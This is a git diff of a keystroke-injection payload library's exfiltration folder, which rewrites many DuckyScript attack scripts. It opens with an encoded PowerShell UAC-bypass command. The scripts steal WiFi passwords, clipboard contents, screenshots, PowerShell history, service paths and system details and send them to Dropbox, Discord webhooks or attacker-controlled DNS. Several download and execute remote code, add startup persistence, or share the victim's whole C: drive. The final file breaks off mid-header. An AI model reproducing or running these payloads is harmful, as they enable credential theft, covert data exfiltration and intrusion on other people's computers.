STRINGLN powershell.exe -enc JABPAE0ARwA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIADQAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBDAFUAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwALgBvAG0AZwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAvAGQAIAAkAE8ATQBHACAALwBmADsADQAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBDAFUAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwAbQBzAC0AcwBlAHQAdABpAG4AZwBzAFwAQwB1AHIAVgBlAHIAIgAgAC8AZAAgACIALgBvAG0AZwAiACAALwBmADsADQAKAGYAbwBkAGgAZQBsAHAAZQByAC4AZQB4AGUADQAKAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AcwAgADMAOwANAAoAcgBlAGcAIABkAGUAbABlAHQAZQAgACIASABLAEMAVQBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABhAHMAcwBlAHMAXAAuAG8AbQBnAFwAIgAgAC8AZgA7AA0ACgByAGUAZwAgAGQAZQBsAGUAdABlACAAIgBIAEsAQwBVAFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcACIAIAAvAGYAOwANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMwA7ACAAZQB4AGkAdAA=;exit

203
payloads/library/exfiltration/ Hard_Con_Exfil/payload.txt
View File

@ -1,189 +1,88 @@
REM Title: Hard_Con_Exfil
REM Author: LulzAnarchyAnon
REM Description: This payload navagates it's way to Hardware, and Connection properties.
REM It then copies, and saves it as a notepad file named "targetloot" to the Downloads folder.
REM It is then exfiltrated via a DropBox Upload.
REM Target: Windows 10
REM Props: Darren Kitchen
REM Props: HUGE PROPS TO I am Jakoby for letting me script kiddie his DropBox PowerShell script!
REM Props: Check out I am Jakoby on Youtube to set up your DropBox for uploads.
REM Props: Don't forget to Like and Subscribe!
REM Version: 1.0
REM Category: Exfiltration
REM_BLOCK
Title: Hard_Con_Exfil
Author: LulzAnarchyAnon
Description: This payload navagates it's way to Hardware, and Connection properties.
It then copies, and saves it as a notepad file named "targetloot" to the Downloads folder.
It is then exfiltrated via a DropBox Upload.
Target: Windows 10
Props: Darren Kitchen
Props: HUGE PROPS TO I am Jakoby for letting me script kiddie his DropBox PowerShell script!
Props: Check out I am Jakoby on Youtube to set up your DropBox for uploads.
Props: Don't forget to Like and Subscribe!
Version: 1.0
Category: Exfiltration
REM This payload may need minor adjustments to run properly depending on
REM Attacker, and Target devices.
This payload may need minor adjustments to run properly depending on
Attacker, and Target devices.
REM In the First stage the targets data is saved to the target device.
REM In the Second stage the loot is uploaded via dropbox.
In the First stage the targets data is saved to the target device.
In the Second stage the loot is uploaded via dropbox.
END_REM
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 500
REM Stage 1
GUI
DELAY 100
STRING network properties
DELAY 200
STRINGLN network properties
REPEAT 3 TAB
ENTER
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 1000
ENTER
DELAY 500
GUI r
DELAY 500
STRING notepad
ENTER
DELAY 500
STRINGLN notepad
CTRL v
DELAY 500
CTRL s
DELAY 500
ALT d
DELAY 500
STRING %USERPROFILE%\Downloads
DELAY 500
ENTER
DELAY 200
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
STRING targetloot
DELAY 100
ENTER
DELAY 100
ALT F4
DELAY 100
ALT F4
STRINGLN %USERPROFILE%\Downloads
REPEAT 6 TAB
STRINGLN targetloot
REPEAT 2 ALT F4
DELAY 2000
REM Stage 2
GUI r
DELAY 200
STRING powershell
DELAY 200
ENTER
DELAY 2000
STRING function DropBox-Upload {
DELAY 500
ENTER
STRING [CmdletBinding()]
DELAY 500
ENTER
STRING param (
DELAY 500
ENTER
STRING [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
DELAY 500
ENTER
STRING [Alias("f")]
DELAY 500
ENTER
STRING [string]$SourceFilePath
DELAY 500
ENTER
STRING )
DELAY 500
ENTER
STRING $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE
DELAY 500
ENTER
STRING "
DELAY 500
ENTER
STRING" # Replace with your DropBox Access Token
DELAY 500
ENTER
STRING $outputFile = Split-Path $SourceFilePath -leaf
DELAY 500
ENTER
STRING $TargetFilePath="/$outputFile"
DELAY 500
ENTER
STRING $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
DELAY 500
ENTER
STRING $authorization = "Bearer " + $DropBoxAccessToken
DELAY 500
ENTER
STRING $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
DELAY 500
ENTER
STRING $headers.Add("Authorization", $authorization)
DELAY 500
ENTER
STRING $headers.Add("Dropbox-API-Arg", $arg)
DELAY 500
ENTER
STRING $headers.Add("Content-Type", 'application/octet-stream')
DELAY 500
ENTER
STRING Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
DELAY 500
ENTER
STRINGLN function DropBox-Upload {
STRINGLN [CmdletBinding()]
STRINGLN param (
STRINGLN [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
STRINGLN [Alias("f")]
STRINGLN [string]$SourceFilePath
STRINGLN )
STRINGLN $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE
STRINGLN "
STRINGLN " # Replace with your DropBox Access Token
STRINGLN $outputFile = Split-Path $SourceFilePath -leaf
STRINGLN $TargetFilePath="/$outputFile"
STRINGLN $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
STRINGLN $authorization = "Bearer " + $DropBoxAccessToken
STRINGLN $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
STRINGLN $headers.Add("Authorization", $authorization)
STRINGLN $headers.Add("Dropbox-API-Arg", $arg)
STRINGLN $headers.Add("Content-Type", 'application/octet-stream')
STRINGLN Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
STRING }
DELAY 5000
GUI r
DELAY 200
STRING %USERPROFILE%\Downloads\
DELAY 500
ENTER
DELAY 500
STRINGLN %USERPROFILE%\Downloads\
STRING targetloot
DELAY 1000
GUI r
DELAY 500
STRING %USERPROFILE%\Downloads\
DELAY 500
ENTER
DELAY 500
STRINGLN %USERPROFILE%\Downloads\
STRING targetloot
DELAY 500
ALT h
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 200
TAB
DELAY 500
REPEAT 5 TAB
ENTER
DELAY 500
ALT F4
DELAY 1000
CTRL v
DELAY 5000
STRING | DropBox-Upload
DELAY 500
ENTER
STRINGLN | DropBox-Upload
DELAY 5000
ENTER
ALT F4
DELAY 100
ENTER

21
payloads/library/exfiltration/Bookmark-Hog/payload.txt
View File

@ -1,16 +1,17 @@
REM Title: Bookmark-Hog
REM_BLOCK
Title: Bookmark-Hog
Author: atomiczsec
Description: This payload is meant to exfiltrate bookmarks to the rubber ducky
Target: Windows 10, 11
REM Author: atomiczsec
Remember to replace the link with your DropBox shared link for the intended file to download
Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
END_REM
REM Description: This payload is meant to exfiltrate bookmarks to the rubber ducky
REM Target: Windows 10, 11
DEFINE #URL <Your Shared link for the intended file>
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
STRINGLN powershell -w h -NoP -NonI -ep Bypass $pl = iwr #URLdl=1; iex $pl

26
payloads/library/exfiltration/Copy-And-Waste/payload.txt
View File

@ -1,17 +1,19 @@
REM Title: Copy-And-Waste
REM_BLOCK
Title: Copy-And-Waste
Author: atomiczsec & I am Jakoby
Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook
Target: Windows 10, 11
REM Author: atomiczsec & I am Jakoby
Remember to replace the link with your pastebin shared link for the intended files to download
Also remember to put in your discord webhook in c.ps1
For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
END_REM
REM Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook
REM Target: Windows 10, 11
DEFINE #URL PASTEBIN LINK FOR BAT
DUCKY_LANG US
DELAY 2000
GUI
DELAY
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
ENTER
REM Remember to replace the link with your pastebin shared link for the intended files to download
REM Also remember to put in your discord webhook in c.ps1
REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
GUI r
DELAY 100
STRINGLN powershell -w h -NoP -NonI -Ep Bypass "echo (iwr #URL).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr #URL).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""

113
payloads/library/exfiltration/Exfil-to-Plug/payload.txt
View File

@ -1,101 +1,78 @@
REM --------------------------------------------------------------------
REM Title: O.MG Plug Basic Local Exfiltrator
REM Description: Exfiltrates via O.MG WebSocket API
REM Author: thisismyrobot
REM Target: Windows 10 (PowerShell)
REM Version: 1.0
REM Category: Exfiltration
REM
REM Local exfiltration for O.MG Plug Basic
REM
REM The Basic version of the Plug cannot do stuff like sharing a local
REM storage device (at least at the time of writing), so this code
REM does local exfil by connecting the target to the O.MG Plug's own
REM WiFi and using WebSockets to save data to a setting.
REM
REM This assumes a WiFi-enabled target of course.
REM
REM Retrieve the data by using the CTList custom command under Debug.
REM
REM Designed to work with an O.MG Plug Basic with firmware v2.5-220322.
REM --------------------------------------------------------------------
REM_BLOCK
--------------------------------------------------------------------
Title: O.MG Plug Basic Local Exfiltrator
Description: Exfiltrates via O.MG WebSocket API
Author: thisismyrobot
Target: Windows 10 (PowerShell)
Version: 1.0
Category: Exfiltration
Local exfiltration for O.MG Plug Basic
The Basic version of the Plug cannot do stuff like sharing a local
storage device (at least at the time of writing), so this code
does local exfil by connecting the target to the O.MG Plug's own
WiFi and using WebSockets to save data to a setting.
This assumes a WiFi-enabled target of course.
Retrieve the data by using the CTList custom command under Debug.
Designed to work with an O.MG Plug Basic with firmware v2.5-220322.
--------------------------------------------------------------------
END_REM
DEFINE #PASSWORD Secret password
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 500
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 1000
STRING cd c:\temp
ENTER
STRINGLN powershell
STRINGLN cd c:\temp
REM -----------------------
REM Collect info to exfil.
REM -----------------------
STRING $e = "Secret password"
STRING $e = "#PASSWORD"
ENTER
REM ----------------------------------
REM Connect to the O.MG AP.
REM ----------------------------------
STRING echo '<?xml version="1.0"?><WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1"><name>O.MG</name><SSIDConfig><SSID><name>O.MG</name></SSID></SSIDConfig><connectionType>ESS</connectionType><MSM><security><authEncryption><authentication>WPA2PSK</authentication><encryption>AES</encryption><useOneX>false</useOneX></authEncryption><sharedKey><keyType>passPhrase</keyType><protected>false</protected><keyMaterial>12345678</keyMaterial></sharedKey></security></MSM></WLANProfile>' > profile.xml
ENTER
STRINGLN echo '<?xml version="1.0"?><WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1"><name>O.MG</name><SSIDConfig><SSID><name>O.MG</name></SSID></SSIDConfig><connectionType>ESS</connectionType><MSM><security><authEncryption><authentication>WPA2PSK</authentication><encryption>AES</encryption><useOneX>false</useOneX></authEncryption><sharedKey><keyType>passPhrase</keyType><protected>false</protected><keyMaterial>12345678</keyMaterial></sharedKey></security></MSM></WLANProfile>' > profile.xml
STRING netsh wlan add profile "profile.xml"
ENTER
STRINGLN netsh wlan add profile "profile.xml"
STRING netsh wlan connect name=O.MG
ENTER
STRINGLN netsh wlan connect name=O.MG
REM --------------------------------
REM Establish websocket connection.
REM --------------------------------
STRING $ws = New-Object Net.WebSockets.ClientWebSocket
ENTER
STRING $ct = New-Object Threading.CancellationToken($false)
ENTER
STRING $connectTask = $ws.ConnectAsync("ws://192.168.4.1/d/ws/issue", $ct)
ENTER
STRING do { Sleep(0.1) } until ($connectTask.IsCompleted)
ENTER
STRINGLN $ws = New-Object Net.WebSockets.ClientWebSocket
STRINGLN $ct = New-Object Threading.CancellationToken($false)
STRINGLN $connectTask = $ws.ConnectAsync("ws://192.168.4.1/d/ws/issue", $ct)
STRINGLN do { Sleep(0.1) } until ($connectTask.IsCompleted)
REM --------
REM Upload.
REM --------
STRING $ct = New-Object Threading.CancellationToken($false)
ENTER
STRING $command = "[custom]CTSet`tcaptured`t$e"
ENTER
STRING [ArraySegment[byte]]$msg = [Text.Encoding]::Utf8.GetBytes($command)
ENTER
STRING $ws.SendAsync($msg, [System.Net.WebSockets.WebSocketMessageType]::Binary, $true, $ct).GetAwaiter().GetResult()
ENTER
STRINGLN $ct = New-Object Threading.CancellationToken($false)
STRINGLN $command = "[custom]CTSet`tcaptured`t$e"
STRINGLN [ArraySegment[byte]]$msg = [Text.Encoding]::Utf8.GetBytes($command)
STRINGLN $ws.SendAsync($msg, [System.Net.WebSockets.WebSocketMessageType]::Binary, $true, $ct).GetAwaiter().GetResult()
DELAY 1000
REM ----------
REM Clean up.
REM ----------
STRING netsh wlan disconnect
ENTER
STRING netsh wlan delete profile name="O.MG"
ENTER
STRING del .\profile.xml
ENTER
STRING exit
ENTER
STRINGLN netsh wlan disconnect
STRINGLN netsh wlan delete profile name="O.MG"
STRINGLN del .\profile.xml
STRINGLN exit

27
payloads/library/exfiltration/Powershell-History/payload.txt
View File

@ -1,16 +1,17 @@
REM Title: Powershell-History
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate powershells history to a dropbox, powershell is commonly used for IT automation
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM_BLOCK
Title: Powershell-History
Author: atomiczsec
Description: This payload is meant to exfiltrate powershells history to a dropbox, powershell is commonly used for IT automation
Target: Windows 10
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
END_REM
DEFINE #URL <Your Shared link for the intended file>
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRINGLN powershell -w h -NoP -NonI -ep Bypass $pl = iwr #URLdl=1; iex $pl

26
payloads/library/exfiltration/Printer-Recon/payload.txt
View File

@ -1,16 +1,20 @@
REM Title: Printer-Recon
REM_BLOCK
Title: Printer-Recon
Author: atomiczsec
REM Author: atomiczsec
Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network
REM Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
Target: Windows 10
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
END_REM
DEFINE #URL <Your Shared link for the intended file>
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRINGLN powershell -w h -NoP -NonI -ep Bypass $pl = iwr #URLdl=1; iex $pl

41
payloads/library/exfiltration/Priv-Paths/payload.txt
View File

@ -1,25 +1,20 @@
REM Title: Priv-Paths
REM Author: atomiczsec
REM Description: A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook.
REM Target: Windows 10
REM_BLOCK
Title: Priv-Paths
Author: atomiczsec
Description: A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook.
Target: Windows 10
END_REM
DEFINE #WEBHOOKURL YOUR-DISCORD-WEBHOOK
DUCKY_LANG US
DELAY 2000
DEFAULT_DELAY 500
DELAY 3000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 500
STRING cd %HOMEPATH%
ENTER
DELAY 1000
STRING wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt
ENTER
DELAY 1000
STRING curl.exe -F "payload_json={\"username\": \"p\", \"content\": \"**Paths**\"}" -F "file=@p.txt" YOUR-DISCORD-WEBHOOK
ENTER
DELAY 200
STRING del p.txt
ENTER
DELAY 100
STRING exit
ENTER
STRINGLN cmd
STRINGLN cd %HOMEPATH%
STRINGLN wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt
STRINGLN curl.exe -F "payload_json={\"username\": \"p\", \"content\": \"**Paths**\"}" -F "file=@p.txt" #WEBHOOKURL
STRINGLN del p.txt
STRINGLN exit

28
payloads/library/exfiltration/Pwn-Drive/payload.txt
View File

@ -1,16 +1,18 @@
REM Title: Pwn-Drive
REM Author: atomiczsec
REM Description: This payload will share the entire victims "C:" drive to the entire network for further exploitation.
REM Target: Windows 10
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM_BLOCK
Title: Pwn-Drive
Author: atomiczsec
Description: This payload will share the entire victims "C:" drive to the entire network for further exploitation.
Target: Windows 10
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
END_REM
DEFINE #URL <Your Shared link for the intended file>
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRINGLN powershell -w h -NoP -NonI -ep Bypass $pl = iwr dl=1; iex $pl

27
payloads/library/exfiltration/Screen-Shock/payload.txt
View File

@ -1,17 +1,22 @@
REM Title: Screen-Shock
REM_BLOCK
Title: Screen-Shock
Author: atomiczsec
REM Author: atomiczsec
Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)
REM Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)
Target: Windows 10
REM Target: Windows 10
Remember to replace the link with your pastebin shared link for the intended files to download
Also remember to put in your discord webhook in c.ps1
For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
END_REM
DEFINE #URLBAT PASTEBIN LINK FOR BAT
DEFINE #URLPS1 PASTEBIN LINK FOR PS1
DUCKY_LANG US
DELAY 2000
GUI
DELAY
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
ENTER
REM Remember to replace the link with your pastebin shared link for the intended files to download
REM Also remember to put in your discord webhook in c.ps1
REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH
GUI r
DELAY 500
STRINGLN powershell -w h -NoP -NonI -Ep Bypass "echo (iwr #URLBAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr #URLPS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""

23
payloads/library/exfiltration/Spotify-Spy/payload.txt
View File

@ -1,16 +1,21 @@
REM Title: Spotify-Spy
REM_BLOCK
Title: Spotify-Spy
REM Author: atomiczsec
Author: atomiczsec
REM Description: This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so.
Description: This payload is meant to exfiltrate spotify usernames on the device. Some people are too afraid to ask for their spotify or playlist so here is a sneaky way to do so.
REM Target: Windows 10
Target: Windows 10
Remember to replace the link with your DropBox shared link for the intended file to download
Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
END_REM
DEFINE #URL <Your Shared link for the intended file>
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
STRINGLN powershell -w h -NoP -NonI -ep Bypass $pl = iwr #URLdl=1; iex $pl

29
payloads/library/exfiltration/WiFi2DNS/WiFi2DNS.txt
View File

@ -1,3 +1,4 @@
REM_BLOCK
# Title: DNS Exfiltrate WiFi names and preshared key
# Description: Exfiltrates WiFi names and PSK using DNS
# Author: Keld Norman / Twitter: @keld_norman
@ -20,29 +21,17 @@
# Be aware that exfiltrated WiFi names and code will be send in clear text over the internet..
#
# TODO: This only works for WiFi names without space in the name.
#
END_REM
DUCKY_LANG US
REM Target: WINDOWS
REM Purpose: Exfiltrate all saved WiFi names + PSK via DNS
DELAY 3000
DELAY 2000
DEFAULT_DELAY 500
CONTROL ESCAPE
DELAY 500
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
CTRL-SHIFT ENTER
DELAY 1000
ALT Y
DELAY 500
ENTER
DELAY 500
STRING @echo off
DELAY 500
ENTER
DELAY 500
STRING for /f "tokens=3* delims=: " %a IN ('netsh wlan show profiles ^|findstr /c:" " ^|findstr ":"') do for /f "tokens=3 delims=: " %c in ('netsh wlan sh pr "%b" key^=clear 2^>nul^|findstr /c:": "^|findstr "Key Content"') do ping -n 1 -w 1000 -4 %b.%c.dns.yourdomain_where_you_have_a_dns_sniffer_and_NS_record_on.com > nul
DELAY 500
ENTER
DELAY 500
STRING exit
DELAY 500
ENTER
STRINGLN @echo off
STRINGLN for /f "tokens=3* delims=: " %a IN ('netsh wlan show profiles ^|findstr /c:" " ^|findstr ":"') do for /f "tokens=3 delims=: " %c in ('netsh wlan sh pr "%b" key^=clear 2^>nul^|findstr /c:": "^|findstr "Key Content"') do ping -n 1 -w 1000 -4 %b.%c.dns.yourdomain_where_you_have_a_dns_sniffer_and_NS_record_on.com > nul
STRINGLN exit

94
payloads/library/exfiltration/WiFi2DNS_AES256/payload.txt
View File

@ -1,3 +1,4 @@
REM_BLOCK
# Title: Exfiltrate WiFi names and preshared keys via AES-256 Encrypted DNS
# Description: Exfiltrates WiFi names and PSK using DNS where the data in transit is encrypted with AES-256
# Author: Keld Norman / Twitter: @keld_norman
@ -18,57 +19,48 @@
3. Open a powershell terminal on your PC, paste in from $scriptblock to the end (also the two extra lines below the script block)
4. The last line called $encoded will produce an output that is the powershell code in an encoded form
4. Use the encoded powershell code in the command below ( paste it in as a replacement for the PUT-THE-ENCODED-CODE-HERE string
END_REM
DUCKY_LANG US
GUI R
DELAY 2
STRING cmd.exe
DELAY 1
ENTER
STRING powershell.exe -windowstyle hidden -NoProfile -EncodedCommand PUT-THE-ENCODED-CODE-HERE
ENTER
DELAY 2000
#-----------------------------------------------------------------------------------------------------------
# COPY THIS AND PASTE IT IN TO A POWERSHELL TERMINAL ON YOUR OWN WINDOWS PC
#-----------------------------------------------------------------------------------------------------------
$scriptblock={
function enc{[CmdletBinding()][OutputType([string])]
Param([Parameter(Mandatory=$true)][String]$K,[Parameter(Mandatory=$true)][String]$T)
$sha=New-Object System.Security.Cryptography.SHA256Managed
$aes=New-Object System.Security.Cryptography.AesManaged
$aes.Mode=[System.Security.Cryptography.CipherMode]::CBC
$aes.Padding=[System.Security.Cryptography.PaddingMode]::Zeros
$aes.BlockSize=128
$aes.KeySize=256
$aes.Key=$sha.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($K))
$byt=[System.Text.Encoding]::UTF8.GetBytes($T)
$cry=$aes.CreateEncryptor()
$enc=$cry.TransformFinalBlock($byt,0,$byt.Length)
$enc=$aes.IV+$enc
$aes.Dispose()
$sha.Dispose()
$b64=[System.Convert]::ToBase64String($enc).ToCharArray()
foreach ($hx in $b64){$hex=$hex+[System.String]::Format("{0:X}",[System.Convert]::ToUInt32($hx))}
return $hex
}
function dns{
$tik=Get-Date -UFormat "%j%H%M%S"
$subchars=get-random -minimum 26 -maximum 50
[regex]::split($_, "(.{$subchars})")|? {$_}|%{Resolve-DnsName -Name $(-join("T",$tik,".",$_,$SUB)) -Type A -QuickTimeout -ErrorAction SilentlyContinue -DnsOnly}
start-sleep -Seconds $(get-random -minimum 1 -maximum 5)
}
function wifi {
$wifinames=netsh wl sh pr|sls "\:(.+)$"|%{$name=$_.Matches.Groups[1].Value.Trim();$_}|%{(netsh wl sh pr n="$name" k=clear)}|sls "Key Content\W+\:(.+)$"|%{$pass=$_.Matches.Groups[1].Value.Trim(); $_}|%{[PSCustomObject]@{A=$name;B=$pass}}|ConvertTo-Csv -NTI -Delimiter ";"|Select -Skip 1
$wifinames.trim()
}
$KEY="EncryptDataWithThisCode"
$SUB=".i.yourdomain.com"
wifi|%{enc -K "$KEY" -T "$_"}|%{dns "$_"}|out-null
}
$encoded = [convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($scriptblock))
$encoded
#-----------------------------------------------------------------------------------------------------------
# END OF STORY
#-----------------------------------------------------------------------------------------------------------
GUI r
DELAY 500
STRINGLN cmd.exe
DELAY 500
STRINGLN powershell.exe -windowstyle hidden -NoProfile -EncodedCommand $scriptblock={
STRINGLN function enc{[CmdletBinding()][OutputType([string])]
STRINGLN Param([Parameter(Mandatory=$true)][String]$K,[Parameter(Mandatory=$true)][String]$T)
STRINGLN $sha=New-Object System.Security.Cryptography.SHA256Managed
STRINGLN $aes=New-Object System.Security.Cryptography.AesManaged
STRINGLN $aes.Mode=[System.Security.Cryptography.CipherMode]::CBC
STRINGLN $aes.Padding=[System.Security.Cryptography.PaddingMode]::Zeros
STRINGLN $aes.BlockSize=128
STRINGLN $aes.KeySize=256
STRINGLN $aes.Key=$sha.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($K))
STRINGLN $byt=[System.Text.Encoding]::UTF8.GetBytes($T)
STRINGLN $cry=$aes.CreateEncryptor()
STRINGLN $enc=$cry.TransformFinalBlock($byt,0,$byt.Length)
STRINGLN $enc=$aes.IV+$enc
STRINGLN $aes.Dispose()
STRINGLN $sha.Dispose()
STRINGLN $b64=[System.Convert]::ToBase64String($enc).ToCharArray()
STRINGLN foreach ($hx in $b64){$hex=$hex+[System.String]::Format("{0:X}",[System.Convert]::ToUInt32($hx))}
STRINGLN return $hex
STRINGLN }
STRINGLN function dns{
STRINGLN $tik=Get-Date -UFormat "%j%H%M%S"
STRINGLN $subchars=get-random -minimum 26 -maximum 50
STRINGLN [regex]::split($_, "(.{$subchars})")|? {$_}|%{Resolve-DnsName -Name $(-join("T",$tik,".",$_,$SUB)) -Type A -QuickTimeout -ErrorAction SilentlyContinue -DnsOnly}
STRINGLN start-sleep -Seconds $(get-random -minimum 1 -maximum 5)
STRINGLN }
STRINGLN function wifi {
STRINGLN $wifinames=netsh wl sh pr|sls "\:(.+)$"|%{$name=$_.Matches.Groups[1].Value.Trim();$_}|%{(netsh wl sh pr n="$name" k=clear)}|sls "Key Content\W+\:(.+)$"|%{$pass=$_.Matches.Groups[1].Value.Trim(); $_}|%{[PSCustomObject]@{A=$name;B=$pass}}|ConvertTo-Csv -NTI -Delimiter ";"|Select -Skip 1
STRINGLN $wifinames.trim()
STRINGLN }
STRINGLN $KEY="EncryptDataWithThisCode"
STRINGLN $SUB=".i.yourdomain.com"
STRINGLN wifi|%{enc -K "$KEY" -T "$_"}|%{dns "$_"}|out-null
STRINGLN }
STRINGLN $encoded = [convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($scriptblock))
STRINGLN $encoded

234
payloads/library/exfiltration/WiFi_Passwd_Grab/payload.txt
View File

@ -1,223 +1,97 @@
REM Title: WiFi_Passwd_Grab
REM Author: LulzAnarchyAnon
REM Description: This is a Three stage payload that begins by navagating to Network
REM Description: and Sharing Center. It then opens the wireless properties security
REM Description: tab, and makes the Network security key visible finally taking a screenshot.
REM Description: In the Second stage the screenshot is saved to the Downloads folder.
REM Description: In the Third, and final stage the screenshot is uploaded via Dropbox.
REM Target: Windows 10 PowerShell
REM Props: Darren Kitchen and I am Jakoby
REM Version: 1.0
REM Category: Exfiltration
REM_BLOCK
Title: WiFi_Passwd_Grab
Author: LulzAnarchyAnon
Description: This is a Three stage payload that begins by navagating to Network
Description: and Sharing Center. It then opens the wireless properties security
Description: tab, and makes the Network security key visible finally taking a screenshot.
Description: In the Second stage the screenshot is saved to the Downloads folder.
Description: In the Third, and final stage the screenshot is uploaded via Dropbox.
Target: Windows 10 PowerShell
Props: Darren Kitchen and I am Jakoby
Version: 1.0
Category: Exfiltration
REM This payload may need minor adjustments to run properly depending on
REM Attacker, and Target devices.
This payload may need minor adjustments to run properly depending on
